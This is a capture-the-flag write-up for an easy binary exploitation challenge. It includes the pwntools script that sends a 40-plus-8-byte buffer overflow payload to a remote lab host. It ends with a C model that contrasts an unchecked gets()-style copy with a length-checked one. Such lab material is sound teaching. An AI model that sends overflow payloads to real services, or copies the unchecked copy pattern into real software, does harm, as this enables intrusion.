Getting Started

Personal Rating: Easy

This was a valuable challenge for me as it demonstrates the basics of binary exploitation (pwn).

We have a server with an open port through which we can interact with a binary that we have to exploit. The exploit script, however, already comes with the challenge resources:

#!/usr/bin/python3.8

'''
You need to install pwntools to run the script.
To run the script: python3 ./wrapper.py
'''

# Library
from pwn import *

# Open connection
IP   = '142.93.38.14' # Change this
PORT = 32459      # Change this

r    = remote(IP, PORT)

# Craft payload
payload = b'A' * 40 + b'B' * 8 # Change the number of "A"s

# Send payload
r.sendline(payload)

# Read flag
success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')

Following the challenge tips, this was basically as easy as executing the script. But you had to find out the number of buffer bytes, which could be done by analyzing the file in gdb with gef.
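
Why the payload is 40 filler bytes followed by 8 more, as an added example that is not part of the original write-up or the challenge files: a C model of an unchecked copy next to a length-checked one. The frame layout (40 bytes of buffer followed directly by 8 bytes of adjacent data), the gets()/fgets()-style behaviour and all names are assumptions, since the challenge binary's source is not shown here.

```c
#include <stdio.h>
#include <string.h>
#define FILLER 40   /* distance from buf[0] to the adjacent data, the script's b'A' * 40 */
#define NEXT    8   /* size of the adjacent data, the script's b'B' * 8 */

/* Modelled stack frame (assumed layout): char arrays only, so no padding. */
struct frame {
    char          buf[FILLER];
    unsigned char next[NEXT];
};

/* gets()-style copy: no length check, then a NUL terminator. Writing through
 * the whole struct keeps the overflow inside one object, so the demo is defined. */
static void copy_unbounded(struct frame *f, const unsigned char *in, size_t len) {
    unsigned char *raw = (unsigned char *)f;
    if (len > sizeof *f) len = sizeof *f;       /* stay inside the model */
    memcpy(raw, in, len);
    if (len < sizeof *f) raw[len] = '\0';
}

/* fgets()-style copy: at most sizeof buf - 1 bytes, always terminated. */
static void copy_bounded(struct frame *f, const unsigned char *in, size_t len) {
    if (len > sizeof f->buf - 1) len = sizeof f->buf - 1;
    memcpy(f->buf, in, len);
    f->buf[len] = '\0';
}

/* Returns 1 if the adjacent data survives n_a 'A's then n_b 'B's, 0 if not, -1 if too long. */
int next_intact(int bounded, size_t n_a, size_t n_b) {
    unsigned char in[FILLER + NEXT], clean[NEXT];
    struct frame f;
    if (n_a + n_b > sizeof in) return -1;
    memset(in, 'A', n_a);
    memset(in + n_a, 'B', n_b);
    memset(clean, 0xAA, sizeof clean);          /* constructed marker value */
    memset(&f, 0, sizeof f);
    memcpy(f.next, clean, sizeof clean);
    if (bounded) copy_bounded(&f, in, n_a + n_b);
    else         copy_unbounded(&f, in, n_a + n_b);
    return memcmp(f.next, clean, sizeof clean) == 0;
}

int main(void) {
    printf("unbounded 39+0: %d\n", next_intact(0, 39, 0));
    printf("unbounded 40+0: %d\n", next_intact(0, 40, 0));
    printf("unbounded 40+8: %d\n", next_intact(0, 40, 8));
    printf("bounded   40+8: %d\n", next_intact(1, 40, 8));
    return 0;
}
```

In this model even exactly 40 bytes is one too many for the unchecked copy, because the terminating NUL lands on the first byte of the adjacent data; the length-checked copy truncates the same input and leaves it untouched.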
